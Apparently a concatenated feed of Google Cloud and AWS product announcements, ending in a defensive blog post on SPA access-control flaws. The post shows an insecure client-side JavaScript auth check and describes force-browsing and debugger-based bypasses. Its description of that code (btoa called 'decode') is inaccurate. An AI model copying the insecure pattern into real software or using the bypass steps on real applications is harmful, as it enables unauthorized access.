Today, we are thrilled to announce the general availability of C4A virtual machines with Titanium SSDs custom designed by Google for cloud workloads that require real-time data processing, with low-latency and high-throughput storage performance. Titanium SSDs on C4A VMs deliver storage performance of up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous generation SSDs.1
Titanium SSDs enhance storage security and performance while offloading local storage processing to free up CPU resources. Titanium SSDs are the first generation of Google SSDs integrated with Titanium, a system that boosts application performance by offloading networking, storage and management from the host CPU into a system of custom silicon, hardware and software on-host and throughout our data centers, connected to the host CPU using a Titanium Offload Processor.
C4A is a VM instance family, based on Google Axion Processors, that provides up to 65% better price-performance and up to 60% better energy efficiency than comparable current-generation x86-based instances2. Together, C4A and Titanium SSDs deliver industry-leading price-performance for a broad range of Arm-compatible general-purpose workloads such as high-performance databases, analytics engines, and search and workloads that benefit from caching and local storage capacity.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3ea62a2a71c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
C4A with Titanium SSDs offer up to 72 vCPUs, 576 GB of memory, and 6 TB of local storage in two shapes — Standard (with 4 GB of memory per vCPU) and High-memory (with 8 GB of memory per vCPU). C4A delivers the connectivity and storage performance that enterprise workloads need withup to 50 Gbps in standard bandwidth and up to 100 Gbps with Tier1 networking for high-traffic applications. C4A instances also support Google Cloud’s latest-generation Balanced and Extreme Hyperdisk storage for scalable, high-performance storage with up to 350k IOPS and 5 GB/s throughput per VM.
Google Cloud customers can use C4A with Titanium SSD in Compute Engine, Google Kubernetes Engine (GKE), Batch, and Dataproc, and more. C4A VMs are also now available in preview in Dataflow, with support for Cloud SQL, AlloyDB, with other services coming soon.
What our customers and partners are saying
“Couchbase Capella Columnar is purpose-built to accelerate complex analytical queries for real-time insights and empower AI-driven applications. Capella Columnar, running on Google Axion C4A instances with Titanium SSDs, delivers unparalleled price-performance, ultra-low latency and scalable compute power for analytic and operational workloads. We look forward to helping organizations deliver premium customer experiences with Capella Columnar on Google Axion processors.”– Matt McDonough, SVP of Product and Partners, Couchbase
“We are excited to introduce Axion-based C4A VMs with Titanium SSDs to Databricks on Google Cloud in the coming weeks, enabling us to deliver ever stronger price-performance and efficiency gains for our customers. The optimizations offered by Google’s latest Axion compute and Hyperdisk storage options will help customers generate more value from their data warehousing and AI investments on the Databricks Data Intelligence Platform.” – Abhishek Rai, Sr. Director of Engineering, Databricks
“Elastic is committed to enabling customers to drive innovation and cost-efficiency with our Search, AI-powered observability, security, and search solutions on Google Cloud. Google Axion-based C4A VMs with Titanium SSDs provided up to 40% better throughput compared to previous generation VMs in our testing. We look forward to introducing Google Cloud C4A VMs with local Titanium SSD on Elastic Cloud.” – Uri Cohen, VP of Product Management, Elastic
Try C4A now
C4A instances are now generally available via on-demand, Spot VMs, reservations, committed use discounts (CUDs), and FlexCUDs. C4A VMs with Titanium SSDs are available in us-central1 (Iowa), us-east4 (Virginia), us-east1 (SC), europe-west1 (Belgium), europe-west4 (Netherlands), europe-west3 (Frankfurt), europe-west2 (London) and asia-southeast1 (Singapore) today, with availability in additional regions coming soon. Get started on C4A with Titanium SSD today g.co/cloud/axion.
1. Results are based on Google Cloud’s internal benchmarking 2. As of September 2024, based on published listed prices. Performance based on the estimated SPECrate®2017_int_base performance benchmark scores run in production on comparable latest-generation generally-available VMs with general purpose storage types.
Bitly’s partnership with Google Web Risk helps enhance Bitly’s ability to protect users and build trust as they generate millions of links and QR Codes daily.
Over the last decade, Bitly has solidified its reputation as a multiproduct connections platform, generating millions of links, QR codes, and mobile landing pages every day. Bitly enables users to shorten and customize long URLs for easier sharing, management, and tracking. Its capabilities in link tracking and analytics make Bitly a powerful and essential tool for brands and businesses of all sizes. As the company continues to scale, it’s constantly exploring new ways to enhance its trust and safety program.
Next, Bitly supports its users by fostering innovation, upholding core values, enforcing an Acceptable User Policy (AUP), and developing user-friendly tools including the Bitly Trust Center.
Finally, Bitly forges partnerships with technology experts and NGOs to combat online threats such as terrorism, child sexual abuse materials (CSAM), and phishing campaigns, including its partnership with Google Web Risk.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ea62abe6f40>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Google Web Risk and Bitly
To strengthen its already robust trust and safety program, Bitly partnered with Google Web Risk to evaluate linked URLs in real-time against Google’s consistently updated database of unsafe web resources and URLs that violate any of the company’s Safe Browsing policies. Web Risk includes data on more than 1 million unsafe URLs, and continually updates this information by analyzing billions of URLs daily. These unsafe URLs typically include social engineering sites — such as phishing and deceptive sites — and sites that host malware or unwanted software.
“Our goal is to keep users safe and earn their trust by leveraging Google Web Risk’s enterprise security service to validate the safety of millions of generated links and QR Codes in real-time. Given the scale and speed of our users generating millions of links each day, Google Web Risk’s ability to handle this type of volume while delivering real-time verdicts is crucial to ensure seamless and safe online experiences,” said Ben Kleiman, director of Trust and Safety, Bitly.
Some of the key features thatBitly and Google Web Risk bring to customers include:
Checking millions of links and QR codes automatically every day, in real-time, for signals of abusive or malicious content.
Delivering high-fidelity confidence scoring for near real-time automatic, programmatic blocking, or warnings of abusive content.
Providing actionable insights on common types of abusive content such as phishing, malware, spam, and other threats targeting users.
Surfacing patterns of abuse that point to bad actors for strategic response.
Strengthening the competitive advantage around brand trust in the safety of Bitly links.
Web Risk confidence scoring avoids false positives
One key area of content safety that can be the trickiest for companies is the calibration of confidence scoring to avoid false positives in threat detection for URLs.
Google Web Risk’s enterprise-grade features include risk scoring and confidence levels, a unique capability that interested Bitly and added value to the partnership. Web Risk’s confidence scoring helps organizations evaluate the maliciousness level of a URL based on blocklists, machine learning models, and heuristic rules. Web Risk ranks URLs as low, medium, high, very high, and extremely high risk.
“We put a significant focus on confidence scoring within Web Risk to maintain customer trust,” said Kleiman. “Failing to block a malicious URL can undermine that trust, just as false positives can hurt user confidence in our links. We meticulously calibrate confidence scoring with Web Risk and have fine-tuned our threshold where our false positive rate has been remarkably low, particularly given the scale of links and QR codes we generate daily.”
Bitly continues to evolve its security stack to protect its users
Navigating the constantly shifting Internet environment proves to be a challenge for every technology company. Bitly recognizes the importance of adopting cutting-edge technology to safeguard its users effectively.
Bitly has a unique vantage point on the Internet since it captures a lot of signals from many different users in many different industries.
“Our goal is to enhance our security infrastructure to make smarter, faster, and more impactful decisions – not just around websites, but also around our users and their associated accounts. Web Risk is now a core part of this effort, and we are looking forward to leveraging more Google resources, like reCAPTCHA, which will be the next big thing to enhance Bitly’s capabilities,” said Kleiman.
As Bitly’s product offerings grow, so does the complexity of the threat landscape faced by the company’s Trust and Safety team. Kleiman said, “As we continue to evolve, Google’s suite of solutions can provide the necessary tools we need to address our evolving needs so that we can stay ahead of the curve.”
The last few weeks of 2024 were exhilarating as we worked to bring you multiple advancements in AI infrastructure, including the general availability of Trillium, our sixth-generation TPU, A3 Ultra VMspowered by NVIDIA H200 GPUs, support for up to 65,000 nodes in Google Kubernetes Engine (GKE), and Parallelstore, our distributed file system service that offers low-latency, high-throughput storage that’s essential for HPC and AI workloads. We’re excited to see what you build with these new capabilities.
These innovations come together in AI Hypercomputer, a systems-level approach that draws from our years of experience serving AI experiences for billions of users, and combines performance-optimized hardware, open software and frameworks, and flexible consumption models. This means when you build your AI solution on Google Cloud, you can choose from a set of purpose-built infrastructure components that are designed to work well together. This freedom to choose the appropriate solution for the needs of your specific workload is fundamental to our approach.
Here are some key updates to AI Hypercomputer from the last quarter based on new infrastructure components and how they enable specific AI use cases.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e565d1aa7c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
Running distributed (multi-node) workloads
The performance of multi-node (multi-host) applications such as large-scale AI training and HPC workloads can be highly sensitive to network connectivity, requiring precise setup and proactive monitoring. We wanted to make it easier for customers to run large multi-node workloads on GPUs, and launched A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. Both offerings were made generally available to close out 2024.
A3 Ultra, with NVIDIA H200 GPUsis a new addition to the A3 family of NVIDIA Hopper GPU-accelerated VMs with twice the GPU-to-GPU network bandwidth and twice the high bandwidth memory (HBM) compared to A3 Mega with NVIDIA H100 GPUs. A3 Ultra VMs offer the best performance in the A3 family. They are built with our new Titanium ML network adapter and incorporate NVIDIA ConnectX-7 network interface cards (NICs) to deliver a secure, high-performance cloud experience for AI workloads. Combined with our datacenter-wide 4-way rail-aligned network, A3 Ultra VMs deliver up to 3.2 Tbps of non-blocking GPU-to-GPU communication with RDMA over Converged Ethernet (RoCE).
A3 Ultra VMs are also available through GKE, which provides an open, portable, extensible, and highly scalable platform for training and serving AI workloads. To try out A3 Ultra VMs, you can easily create a cluster with GKE or try this pretraining GPU recipe.
Hypercompute Cluster, meanwhile, is a supercomputing services platform built on AI Hypercomputer that lets you deploy and manage a large number of accelerators as a single unit. With features such as dense co-location of resources with ultra-low-latency networking, targeted workload placement, advanced maintenance controls to minimize workload disruption, and topology-aware scheduling integrated into popular schedulers like Slurm and GKE, we built Hypercompute Cluster to help you achieve your throughput and resilience goals. You can use a single API call with pre-configured and validated templates for reliable and repeatable deployments, and with cluster-level observability, health monitoring, and diagnostic tooling, Hypercompute Clusters can run your most demanding workloads easily on Google Cloud. Hypercompute Cluster is now available with A3 Ultra VMs.
LG Research is an active user of Google Cloud infrastructure, which they used to train their large language model, Exaone 3.0. They are also an early adopter of A3 Ultra VMs and Hypercompute Cluster, which they are using to power their next set of innovations.
“From the moment we started using Google Cloud’s A3 Ultra with Hypercompute Cluster, powered by NVIDIA H200 GPUs, we were immediately struck by its remarkable performance gains and seamless scalability for our AI workloads. Even more impressive, we had our cluster up and running with our code in under a day — an enormous improvement from the 10 days it used to take us. We look forward to further exploring the potential of this advanced infrastructure for our AI initiatives.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Making inference on TPUs easier
To enable the next generation of AI agents capable of complex, multi-step reasoning, you need accelerators designed to handle the demanding computational requirements of these advanced models. Trillium TPUs provide significant advancements for inference workloads, delivering up to 3x improvement in inference throughput compared to prior generation TPU v5e.
There are multiple ways to leverage Google Cloud TPUs for AI inference based on your specific needs. You can do this through Vertex AI, our fully managed, unified AI development platform for building and using generative AI, and which is powered by the AI Hypercomputer architecture under the hood. But if you need greater control, we have options lower in the stack that are designed for optimal serving on Cloud TPUs: JetStream is a memory-and-throughput-optimized serving engine for LLMs. MaxDiffusion offers a launching point for diffusion models. And for the Hugging Face community, we worked closely with Hugging Face to launch Optimum TPU and Hugging Face TGI to make serving on Cloud TPUs easier.
Most recently, we announced experimental support for vLLM on TPU with PyTorch/XLA 2.5. Motivated by the great response for this popular serving option, we’ve been running a preview with a small set of customers to get to the stage of bringing the performance (and price-performance) benefits of Cloud TPUs to vLLM.
Our goal is to make it easy for you to try out Cloud TPUs with your existing vLLM setup — just make a few configuration changes to see performance and efficiency benefits in Compute Engine, GKE, Vertex AI, and Dataflow. You can take vLLM for a spin on the Trillium TPUs with this tutorial. All this innovation is happening in the open, and we welcome your contributions.
As we start a new year, we’re excited to continue pushing the boundaries of AI infrastructure with AI Hypercomputer. These updates represent our ongoing commitment to providing you with the performance, efficiency, and ease of use you need to accelerate your AI journey. We look forward to seeing what you achieve with these new capabilities.
Today, AWS Partner Central announces the general availability of Partner Connections, which allows AWS Partners to discover and connect with other Partners for collaboration on shared customer opportunities. With Partner Connections, Partners can co-sell joint solutions, accelerate deal progression, and expand their reach by teaming with other AWS Partners.
At the core of Partner Connections are two key capabilities: connections discovery and multi-partner opportunities. The connections discovery feature uses AI-powered recommendations to streamline Partner matchmaking, making it easier for Partners to find suitable collaborators and add them to their network. With multi-partner opportunities, Partners can work together seamlessly to create and manage joint customer opportunities in APN Customer Engagements (ACE). This integrated approach allows Partners to work seamlessly with AWS and other Partners on shared opportunities, reducing the operational overhead of managing multi-partner opportunities.
Partners can also create, update, and share multi-partner opportunities using the Partner Central API for Selling. Our CRM integration Partners can also enable this capability, allowing their customers to collaborate with other Partners and AWS on joint sales opportunities from their own customer relationship management (CRM) system.
AWS Elastic Beanstalk is expanding its Spot allocation strategy options to include capacity-optimized-prioritized, lowest-price and price-capacity-optimized, in addition to the existing default capacity-optimized strategy.
AWS Elastic Beanstalk is a service that provides the ability to deploy and manage applications in AWS without worrying about the infrastructure that runs those applications. Customers can now enjoy additional allocation strategy options for Spot instances on Elastic Beanstalk such as capacity-optimized-prioritized, lowest-price, and price-capacity-optimized strategies. The capacity-optimized-prioritized strategy allows users to prioritize instance types while still focusing on available capacity, ideal for workloads with specific instance preferences. The lowest-price strategy requests your Spot Instances using the lowest priced pools to maximize cost savings. The price-capacity-optimized strategy balances both price and capacity availability, offering a middle ground for users seeking to optimize costs without compromising too much on the likelihood of interruptions.
These strategies are available in commercial regions where Elastic Beanstalk is available including the AWS GovCloud (US) Regions. For a complete list of regions and service offerings, see AWS Regions.
For more information on Spot allocation strategies and Elastic Beanstalk please see our developer guide. To learn more about Elastic Beanstalk, visit the Elastic Beanstalk product page.
Today, Amazon ElastiCache announces support for Service Quotas. This enhancement provides customers with improved visibility and control over their ElastiCache service quotas, streamlining the quota management process and reducing the need for manual interventions.
With Service Quotas, customers can now view and manage their ElastiCache quota limits directly through the AWS Service Quotas console. This integration enables automated limit increase approvals for eligible requests, improving response times and reducing the number of support tickets. Customers will also benefit from visibility into quota usage for all on-boarded quotas via Amazon CloudWatch usage metrics, allowing for better resource planning and management.
Service Quotas for ElastiCache is available in all commercial regions and the AWS GovCloud (US) Regions.
Today, Amazon MSK announced the availability of four additional instance sizes of Graviton3-based M7g instances for Express Brokers. With this launch, you now have seven different instance sizes to choose from to host Express Brokers in Amazon Managed Streaming for Apache Kafka (Amazon MSK), ranging from large to 16xlarge.
Express brokers are a new broker type for Amazon MSK Provisioned designed to deliver up to 3x more throughput per broker, scale up to 20x faster, and reduce recovery time by 90% as compared to standard Apache Kafka brokers. Express brokers come preconfigured with Kafka best practices by default, support all Kafka APIs, and provide the same low-latency performance that Amazon MSK customers expect, so they can continue using existing client applications without any changes.
Today, Amazon MemoryDB announces support for Service Quotas. This enhancement provides customers with improved visibility and control over their MemoryDB service quotas, streamlining the quota management process and reducing the need for manual interventions.
With Service Quotas, customers can now view and manage their MemoryDB quota limits directly through the AWS Service Quotas console. This integration enables automated limit increase approvals for eligible requests, improving response times and reducing the number of support tickets.
Service Quotas for MemoryDB is available in all commercial regions and the AWS GovCloud (US) Regions where MemoryDB is available.
We are excited to announce that Amazon OpenSearch Serverless is expanding availability to the Amazon OpenSearch Serverless to Asia Pacific (Hong Kong) region. OpenSearch Serverless is a serverless deployment option for Amazon OpenSearch Service that makes it simple to run search and analytics workloads without the complexities of infrastructure management. OpenSearch Serverless’ compute capacity used for data ingestion, search, and query is measured in OpenSearch Compute Units (OCUs). To control costs, customers can configure maximum number of OCUs per account.
Today, AWS is announcing the availability of AWS Backup Audit Manager support for cross-account, cross-Region reports in the AWS GovCloud (US) Regions. Now, you can use your AWS Organizations’ management or delegated administrator account to generate aggregated cross-account and cross-Region reports on your data protection policies and retrieve operational data about your backup and recovery activities. AWS Backup enables you to centralize and automate data protection policies across AWS services based on organizational best practices and regulatory standards, and AWS Backup Audit Manager is a feature within the AWS Backup service that allows you to audit and report on the compliance of your data protection policies to help you meet your business and regulatory needs.
AWS Backup Audit Manager is available today in the US East (Ohio, N. Virginia), US West (N. California, Oregon), Canada (Central), Europe (Frankfurt, Ireland, London, Milan, Paris, Stockholm), South America (Sao Paulo), Africa (Cape Town), Asia Pacific (Hong Kong, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo), Middle East (Bahrain), and AWS GovCloud (US-East, US-West) Regions. To learn more about AWS Backup Audit Manager, visit the product page and documentation. To get started, visit the AWS Backup console.
AWS Marketplace now supports the collection of Swiss Value Added Tax (VAT) on sales by Independent Software Vendors (ISVs) to customers located in Switzerland. This allows ISVs registered for Swiss VAT to simplify and streamline their tax operations on AWS Marketplace in Switzerland. In addition, AWS Marketplace now supports Multiple Tax Profiles for Switzerland, a new feature that enables ISVs to associate multiple VAT registrations with a single seller account. These features make it easier for global ISVs to do business in Switzerland by simplifying their tax management.
With this launch, ISVs will no longer be required to manually manage the Swiss VAT for their sales in Switzerland. ISVs can now also add a new supplemental Swiss VAT registration number to their seller account which will be taken into account in connection with their sales to customers in Switzerland. AWS Marketplace will calculate, collect and remit the Swiss VAT to the ISVs, and provide a detailed tax report to help ISVs meet their tax obligations.
Tax Collection for Switzerland is available for all ISVs registered with Swiss VAT and when transacting via the AWS Europe, Middle East, and Africa (EMEA) Marketplace Operator. For Multiple Tax Profiles, ISVs can opt-in to add, update, view and manage their supplemental Swiss VAT registration associated with their account using the AWS Marketplace Management portal or the API operations for Tax Settings.
AWS Elemental MediaTailor now lets you filter which logs you want to capture. You can choose specific log types like Ad Server Interactions or individual events like Ad Server Responses, helping reduce costs and complexity by only collecting the data you need. To enable this feature, you add filtering parameters to your session requests to customize logging for each playback session.
Visit the AWS region table for a full list of AWS Regions where AWS Elemental MediaTailor is available. To learn more about MediaTailor, please visit the product page.
The Customer Carbon Footprint Tool is now available on a dedicated page in the AWS Billing console, under Cost and Usage Analysis. It is no longer in the Cost and Usage Reports page, as this page is being deprecated.
The Customer Carbon Footprint Tool supports customers on their sustainability journey. When signed into the AWS Billing console, customers can view their carbon emissions data for the past 36 months by geographical location and by AWS services, including Amazon Elastic Compute Cloud (EC2) and Amazon Simple Storage Service (S3). All other services are reported as Other. They can also measure changes in their carbon footprint over time, as they deploy new resources in the cloud.
To learn more about the Customer Carbon Footprint tool, visit the product page or review the User Guide. Current AWS customers can visit the AWS Billing console to start using this tool as they progress on their sustainability journey.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C7i-flex instances that deliver up to 19% better price performance compared to C6i instances, are available in the AWS GovCloud (US-West) Region. C7i-flex instances expand the EC2 Flex instances portfolio to provide the easiest way for you to get price performance benefits for a majority of compute intensive workloads. The new instances are powered by the 4th generation Intel Xeon Scalable custom processors (Sapphire Rapids) that are available only on AWS, and offer 5% lower prices compared to C7i.
C7i-flex instances offer the most common sizes, from large to 8xlarge, and are a great first choice for applications that don’t fully utilize all compute resources. With C7i-flex instances, you can seamlessly run web and application servers, databases, caches, Apache Kafka, and Elasticsearch, and more. For compute-intensive workloads that need larger instance sizes (up to 192 vCPUs and 384 GiB memory) or continuous high CPU usage, you can leverage C7i instances.
C7i-flex instances are available in the following AWS Regions: US East (N. Virginia, Ohio), US West (N. California, Oregon), Europe (Frankfurt, Ireland, London, Paris, Spain, Stockholm), Canada (Central), Asia Pacific (Malaysia, Mumbai, Seoul, Singapore, Sydney, Tokyo), South America (São Paulo) and AWS GovCloud (US-West).
AWS announces GeneralPurpose.4xlarge and GeneralPurpose.8xlarge bundles for Amazon WorkSpaces Personal and Amazon WorkSpaces Core, providing customers with powerful cloud desktops for resource-intensive Windows workloads.
GeneralPurpose.4xlarge bundles offer 16vCPUs and 64 GB RAM, while GeneralPurpose.8xlarge bundles provide 32vCPUs and 128 GB RAM. Both bundles include a 175GB root volume and a 100GB user volume and are available on WorkSpaces Personal and WorkSpaces Core. These new large bundles are designed to allow developers, scientists, financial analysts, and engineers to run demanding applications with ease. Developers can handle large compilation and development tasks with tools like Visual Studio, IntelliJ, and Eclipse, while engineers and scientists can run complex simulations with MatLab, GNU Octave, R, and Stata. With pay-as-you-go pricing and on-demand scaling, these bundles offer an efficient alternative to costly physical workstations.
The new General Purpose bundles are available today in AWS Regions where WorkSpaces Personal and WorkSpaces Core are offered, except Africa (Cape Town) and Israel (Tel Aviv). They support Windows Server 2022 and Windows 11 through BYOL options. You can launch these bundles through the Amazon WorkSpaces Console, or via APIs. To get started, sign in to the Amazon WorkSpaces Management Console. For pricing details, visit Amazon WorkSpaces Personal pricing or Amazon WorkSpaces Core pricing.
In many industries including finance and healthcare, sensitive data such as payment card numbers and government identification numbers need to be secured before they can be used and shared. A common approach is applying tokenization to enhance security and manage risk.
A token is a substitute value that replaces sensitive data during its use or processing. Instead of directly working with the original, sensitive information (usually referred to as the “raw data”), a token acts as a stand-in. Unlike raw data, the token is a scrambled or encrypted value.
Using tokens reduces the real-world risk posed by using the raw data, while maintaining the ability to join or aggregate values across multiple datasets. This technique is known as preserving referential integrity.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e50e5d3cf40>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Tokenization engineered into Google Cloud
While tokenization is often seen as a specialized technology that can be challenging and potentially expensive to integrate into existing systems and workflows, Google Cloud offers powerful, scalable tokenization capabilities as part of our Sensitive Data Protection service. With it, you can make calls into serverless API endpoints to tokenize data on the fly in your own applications and data pipelines.
This allows you to enable tokenization without needing to manage any third-party deployments, hardware, or virtual machines. Additionally, the service is fully regionalized, which means tokenization processing happens in the geographical region of your choice helping you to adhere to regulatory or compliance regimes. The pricing is based on data-throughput with no upfront costs, so you can scale to meet the needs of your business with as little or as much as you need.
Sensitive Data Protection takes things even further offering in-line tokenization for unstructured, natural language content. This allows you to tokenize data in the middle of a sentence and if you pick two-way tokenization (and have the right access permissions), you can even detokenize data back when necessary.
This opens up a whole new set of use-cases including run time tokenization of logs, customer chats, or even as part of a generative AI-serving framework. We’ve also built this technology directly into Contact Center AI and Dialogflow services so that you can tokenize customer engagement on-the-fly.
Tokenization with BigQuery
In addition to serverless access through Sensitive Data Protection, we also offer tokenization directly in BigQuery. This gives you tokenization methods at your fingertips in BigQuery SQL queries, User Defined Functions (UDFs), views, and pipelines.
Tokenization technology is built directly into the BigQuery engine to work at high speed and high scale for structured data, such as tokenizing an entire column of values. The resulting tokens are compatible and interoperable with those generated through our Sensitive Data Protection engine. That means you can tokenize or detokenize in either system without incurring unnecessary latency or costs, all while maintaining the same referential integrity.
Using tokens to solve real problems
While the token obfuscates the risk, utility and value are still preserved. Consider the following table which has four rows and three unique values: value1, value2, value3.
Here you can see that each value is replaced with a token. Notice how “value1” gets “token1” consistently. If you run an aggregation and count unique tokens, you’ll get a count of three, just like on the original value. If you were to join on the tokenized values, you’d get the same type of joins as if joining on the original value.
This simple approach unlocks a lot of use cases.
Obfuscating real-world risk
Consider the use-case of running fraud analysis across 10 million user accounts. In this case, let’s say that all of your transactions are linked to the end-users email address.An email address is an identifier that poses several risks:
It can be used to contact the end-user who owns that email address.
It may link to data in other systems that are not supposed to be joined.
It may identify someone’s real world identity and risk exploding that identity’s connection to internal data.
It may leak other forms of identity, such as the name of the owner of the email account.
Let’s say that the token for that email is “EMAIL(44):AYCLw6BhB0QvauFE5ZPC86Jbn59VogYtTrE7w+rdArLr” and this token has been scoped only to the tables and dataset need for fraud analysis. That token can now be used in place of that email address and you can tokenize the emails across all the transaction tables, and then run fraud analysis.
During this analysis any users or pipelines exposed to the data would only see the obfuscated emails, thus protecting your 10 million users while unblocking your business.
Next steps
Tokenization provides a powerful way to protect sensitive information while still allowing for essential data operations. By replacing sensitive data with non-sensitive substitutes, tokens can significantly reduce the risk of data breaches and simplify compliance efforts. Google Cloud simplifies tokenization by offering a readily available, scalable, and region-aware service, allowing you to focus on your core business rather than managing infrastructure.
To get started on using tokenization on Google Cloud, see the following:
Written by: Steven Karschnia, Truman Brown, Jacob Paullus, Daniel McNamara
Executive Summary
Due to their client-side nature, single-page applications (SPAs) will typically have multiple access control vulnerabilities
By implementing a robust access control policy on supporting APIs, the risks associated with client-side rendering can be largely mitigated
Using server-side rendering within the SPA can prevent unauthorized users from modifying or even viewing pages and data that they are not authorized to see
Introduction
Single-page applications (SPAs) are popular due to their dynamic and user-friendly interfaces, but they can also introduce security risks. The client-side rendering frequently implemented in SPAs can make them vulnerable to unauthorized access and data manipulation. This blog post will explore the vulnerabilities inherent in SPAs, including routing manipulation, hidden element exposure, and JavaScript debugging, as well as provide recommendations on how to mitigate these risks.
Single-Page Applications
A SPA is a web application design framework in which the application returns a single document whose content is hidden, displayed, or otherwise modified by JavaScript. This differs from the flat file application framework traditionally implemented in PHP or strictly HTML sites and from the Model-View-Controller (MVC) architecture where data, views, and server controls are handled by different portions of the application. Dynamic data in SPAs is updated through API calls, eliminating the need for page refreshes or navigation to different URLs. This approach makes SPAs feel more like native applications, offering a seamless user experience. JavaScript frameworks that are commonly used to implement SPAs include React, Angular, and Vue.
Client-Side Rendering
In SPAs that use client-side rendering, a server responds to a request with an HTML document that contains only CSS, metadata, and JavaScript. The initially returned HTML document does not contain any content, and instead once the JavaScript files have been run in the browser, the application’s frontend user interface (UI) and content is loaded into the HTML document at runtime. If the application is designed to use routing, JavaScript takes the URL and attempts to generate the page that the user requested. While this is happening, the application is making requests to the API endpoint to load data and check whether or not the current user is authorized to access the data. If a user is not yet authenticated, then the application will render a login page or redirect the user to a separate single sign-on (SSO) application for authentication.
While all of this happens, a user may briefly observe a blank white page before the application dashboard or login page is loaded into their browser. During this pause, the application is potentially loading hundreds of thousands of lines of minified JavaScript that will build the full user experience of the application. SPAs are used in millions of applications across the globe, including Netflix, Hulu, Uber, and DoorDash.
Issues with Client-Side Rendering
Because SPAs rely entirely on the client’s browser to render content (using API data), users have significant control over the application. This enables users to manipulate the application freely, making user or role impersonation easier.
Routing
One fundamental aspect of the JavaScript frameworks that SPAs are implemented in is the idea of routes. These frameworks use routes to indicate different pages in the application. Routes in this case are different views that a user can see, like a dashboard or user profile. Since all of the JavaScript is handled by the client’s browser, the client can view these routes in the JavaScript files that are included in the application source. If a user can identify these routes, they can attempt to access any of them. Depending on how the JavaScript was implemented, there may be checks in place to see if a user has access to the specific route. The following is an example of React routing that includes information on creating the views, and more importantly path attributes.
One way that access control is handled by SPAs is through hidden page elements. This means that when the page loads, the application checks the user’s role through local/session storage, cookie values, or server responses. After the application checks the user’s role, it then displays or hides elements based on the user’s role. In some cases, the application only renders elements that are accessible by the user. In other cases, the application renders every element but “hides” them by controlling the CSS properties of the element. Hidden elements can be exposed through browser Developer Tools, allowing users to force their display. These hidden elements could be form fields or even links to other pages.
JavaScript Debugging
Modern browsers allow users to debug JavaScript in real time with breakpoints. Modern web browsers allow breakpoints to be set on JavaScript files, which can be used to modify variables or rewrite functions all together. Debugging core functions can allow users to bypass access controls and gain unauthorized page access. Consider the following JavaScript:
function isAuth() {
var user;
var cookies = document.cookies;
var userData = btoa(cookies).split(‘:’);
if (userData.length == 3) {
user.name = userData[0];
user.role = userData[1];
user.isAuthed = userData[2];
} else {
user.name = “”;
user.role = “”;
user.isAuthed = false;
}
return user;
}
The previously defined function reads a user’s cookie, Base64 decodes the value, splits the text using : as the delimiter, and if the values match, it considers the user as authenticated. Identifying these core functions allows an attacker to bypass any authorization and access controls that are being handled by the client-side application.
Exploitation
Manually exploiting JavaScript framework issues takes time and practice, but there are a few techniques that can make it easier. A common technique involves analyzing JavaScript files to identify application routes. Identifying routes allows you to “force-browse” to application pages and access them directly, rather than through the UI. This technique may work on its own, but other times you may need to identify any role checks in the application. These checks can be accessed through the JavaScript debugger to modify variables during execution to bypass authorization or authentication checks. Another useful technique involves capturing server responses to requests for user information in an HTTP proxy, such as Burp Suite Professional, and manually modifying the user object. While these exploitation techniques are effective, they can be mitigated through strong preventative measures, including those detailed in this post.
Recommendations
Access control issues are systemic to client-side-rendered JavaScript frameworks. Once a user has the application loaded into their browser, there are few effective mitigations to prevent the user from interacting with content in unauthorized ways. However, by implementing robust server-side access control checks on APIs, the effect that an attacker could produce is severely reduced. While the attacker might be able to view what a page would look like in the context of an administrator or even view the structure of a privileged request, the attacker would be unable to obtain or modify restricted data.
API requests should be logged and monitored to identify if unauthorized users are attempting to or successfully accessing protected data. Additionally, it is advisable to conduct periodic penetration tests of web applications and APIs throughout their lifetime to identify any gaps in security. Penetration testing should uncover any APIs with partial or incomplete access control implementations, which would provide an opportunity to remediate flaws before they are abused by an adversary.
API Access Controls
Implementing robust API access controls is critical for securing SPAs. Access control mechanisms should use a JSON Web Token (JWT) or other unique, immutable session identifier to prevent users from modifying or forging session tokens. API endpoints should validate session tokens and enforce role-based access for every interaction. APIs are often configured to check if a user is authenticated, but they don’t comprehensively check user role access to an endpoint. In some cases, just one misconfigured endpoint is all it takes to compromise an application. For example, if all application endpoints are checking a user’s role except the admin endpoint that creates new users, then an attacker can create users at arbitrary role levels, including admin users.
An example of proper API access control is shown in Figure 1.
This diagram shows a user authenticating to the application, receiving a JWT, and rendering a page. The user interacts with the SPA and requests a page. The SPA identifies that the user is not authenticated so the JavaScript renders the login page. Once a user submits the login request, the SPA forwards it to the server through an API request. The API responds stating the user is authenticated and provides a JWT that can be used with subsequent requests. Once the SPA receives the response from the server, it stores the JWT and renders the dashboard that the user originally requested.
At the same time, the SPA requests the data necessary to render the page from the API. The API sends the data back to the application, and it is displayed to the user. Next, the user finds a way to bypass the client-side access controls and requests the main admin page in the application. The SPA makes the API requests to render the data for the admin page. The backend server checks the user’s role level, but since the user is not an admin user, the server returns a 403 error stating that the user is not allowed to access the data.
The example in Figure 1 shows how API access controls prevent a user from accessing API data. As stated in the example, the user was able to access the page in the SPA; however, due to the API access controls, they are not able to access the data necessary to fully render the page. For APIs developed in C# or Java, frameworks often provide annotations to simplify implementing access controls.
Server-Side Rendering
